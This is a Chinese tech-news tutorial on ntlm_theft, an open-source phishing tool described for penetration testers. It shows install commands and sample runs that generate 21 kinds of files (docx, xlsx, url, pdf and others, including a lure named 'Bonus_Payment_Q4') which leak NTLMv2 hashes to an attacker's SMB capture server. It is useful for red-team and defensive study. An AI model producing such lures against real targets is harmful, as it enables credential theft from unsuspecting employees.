社区编辑申请
注册/登录
如何使用ntlm_theft生成各种类型的NTLMv2哈希窃取文件
安全 网站安全
ntlm_theft是一款基于Python 3开发的开源工具,可以生成21种不同类型的哈希窃取文档。

关于ntlm_theft

ntlm_theft是一款基于Python 3开发的开源工具,可以生成21种不同类型的哈希窃取文档。该工具适用于网络钓鱼攻击,可以用于支持外网SMB流量和内部网络环境之中。与基于宏的文档或利用漏洞的文档相比,这些文件类型的好处在于,所有的这些文件都是使用“预期功能”构建的。

使用场景

ntlm_theft主要针对渗透测试人员和红队研究人员设计,可以帮助研究人员对目标公司员工进行内部网络钓鱼,或大规模测试防病毒和电子邮件网关的安全性。如果外网防火墙上允许出站SMB访问,则它也可用于外部网络钓鱼。

工具依赖

ntlm_theft基于Python 3开发,因此我们需要在本地环境安装并配置好Python 3环境,并安装好xlsxwriter:

  1. pip3 install xlsxwriter 

工具下载

广大研究人员可以使用下列命令将该项目源码克隆至本地:

  1. git clone https://github.com/Greenwolf/ntlm_theft.git 

工具参数

ntlm_theft的运行需要提供四个必要参数,一个输入格式,输入文件或目录,以及基础的运行模式:

  • -g, --generate : 选择生成所有文件或指定文件类型
  • -s, --server : SMB哈希捕捉服务器的IP地址
  • -f, --filename : 不包含后缀的基础文件名,之后可以进行重命名

工具运行

下面给出的工具演示样例中,我们将使用ntlm_theft生成所有文件:

  1. # python3 ntlm_theft.py -g all -s 127.0.0.1 -f test 
  2.  
  3. Created: test/test.scf (BROWSE) 
  4.  
  5. Created: test/test-(url).url (BROWSE) 
  6.  
  7. Created: test/test-(icon).url (BROWSE) 
  8.  
  9. Created: test/test.rtf (OPEN) 
  10.  
  11. Created: test/test-(stylesheet).xml (OPEN) 
  12.  
  13. Created: test/test-(fulldocx).xml (OPEN) 
  14.  
  15. Created: test/test.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE) 
  16.  
  17. Created: test/test-(includepicture).docx (OPEN) 
  18.  
  19. Created: test/test-(remotetempl*ate).docx (OPEN) 
  20.  
  21. Created: test/test-(frameset).docx (OPEN) 
  22.  
  23. Created: test/test.m3u (OPEN IN WINDOWS MEDIA PL*AYER ONLY) 
  24.  
  25. Created: test/test.asx (OPEN) 
  26.  
  27. Created: test/test.jnlp (OPEN) 
  28.  
  29. Created: test/test.application (DOWNLOAD AND OPEN) 
  30.  
  31. Created: test/test.pdf (OPEN AND ALLOW) 
  32.  
  33. Created: test/zoom-attack-instructions.txt (PASTE TO CHAT) 
  34.  
  35. Generation Complete. 

在下面的工具使用样例中,我们将使用ntlm_theft仅生成现代文件:

  1. # python3 ntlm_theft.py -g modern -s 127.0.0.1 -f meeting 
  2.  
  3. Skipping SCF as it does not work on modern Windows 
  4.  
  5. Created: meeting/meeting-(url).url (BROWSE TO FOLDER) 
  6.  
  7. Created: meeting/meeting-(icon).url (BROWSE TO FOLDER) 
  8.  
  9. Created: meeting/meeting.rtf (OPEN) 
  10.  
  11. Created: meeting/meeting-(stylesheet).xml (OPEN) 
  12.  
  13. Created: meeting/meeting-(fulldocx).xml (OPEN) 
  14.  
  15. Created: meeting/meeting.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE) 
  16.  
  17. Created: meeting/meeting-(includepicture).docx (OPEN) 
  18.  
  19. Created: meeting/meeting-(remotetempl*ate).docx (OPEN) 
  20.  
  21. Created: meeting/meeting-(frameset).docx (OPEN) 
  22.  
  23. Created: meeting/meeting-(externalcell).xlsx (OPEN) 
  24.  
  25. Created: meeting/meeting.m3u (OPEN IN WINDOWS MEDIA PL*AYER ONLY) 
  26.  
  27. Created: meeting/meeting.asx (OPEN) 
  28.  
  29. Created: meeting/meeting.jnlp (OPEN) 
  30.  
  31. Created: meeting/meeting.application (DOWNLOAD AND OPEN) 
  32.  
  33. Created: meeting/meeting.pdf (OPEN AND ALLOW) 
  34.  
  35. Skipping zoom as it does not work on the latest versions 
  36.  
  37. Skipping Autorun.inf as it does not work on modern Windows 
  38.  
  39. Skipping desktop.ini as it does not work on modern Windows 
  40.  
  41. Generation Complete. 

在下面的工具使用样例中,我们将使用ntlm_theft仅生成一份xlsx文件:

  1. # python3 ntlm_theft.py -g xlsx -s 192.168.1.103 -f Bonus_Payment_Q4 
  2.  
  3. Created: Bonus_Payment_Q4/Bonus_Payment_Q4-(externalcell).xlsx (OPEN) 
  4.  
  5. Generation Complete. 

工具运行截图

项目地址

ntlm_theft:【GitHub传送门

 

责任编辑:赵宁宁 来源: FreeBuf
相关推荐

2022-04-11 13:34:07

区块链比特币安全

2022-04-26 09:23:07

Hare编程语言C

2022-02-08 16:32:07

2022-03-07 15:37:47

黑客网络攻击

2022-06-05 08:09:21

CollisionLinux 应用Linux

2022-05-18 14:18:56

区块链加密技术数据

2021-05-14 07:35:06

Vue Router 特性变化

2022-06-06 08:16:16

2022-04-22 13:01:13

勒索软件黑客网络攻击

2022-04-26 10:13:00

哈希索引MySQLInnoDB

2022-05-11 14:41:18

微软零日漏洞Windows

2022-04-06 13:43:58

Collision开源

2022-05-20 08:18:24

2022-05-20 15:22:10

恶意软件僵尸网络网络攻击

2022-05-10 07:20:18

Linux系统密码

2022-06-15 16:06:29

LZ4 算法硬件加速

2022-06-01 09:04:58

Kafka运维副本迁移

2022-06-10 08:17:52

2022-04-01 15:59:05

区块链安全数据结构本

2022-01-27 08:31:20

同话题下的热门内容

超低成本DDoS攻击来袭,看WAF如何绝地防护

编辑推荐

聊一聊SQLMAP在进行SQL注入时的整个流程如何做好Linux系统安全加固之账号安全?11个安全小技巧分享DevSecOps:新手需考虑的四个要点如何找到并杀死Linux数据中心服务器上的僵尸进程?DNS系统原理及漏洞利用分析(上)
我收藏的内容
点赞
收藏

51CTO技术栈公众号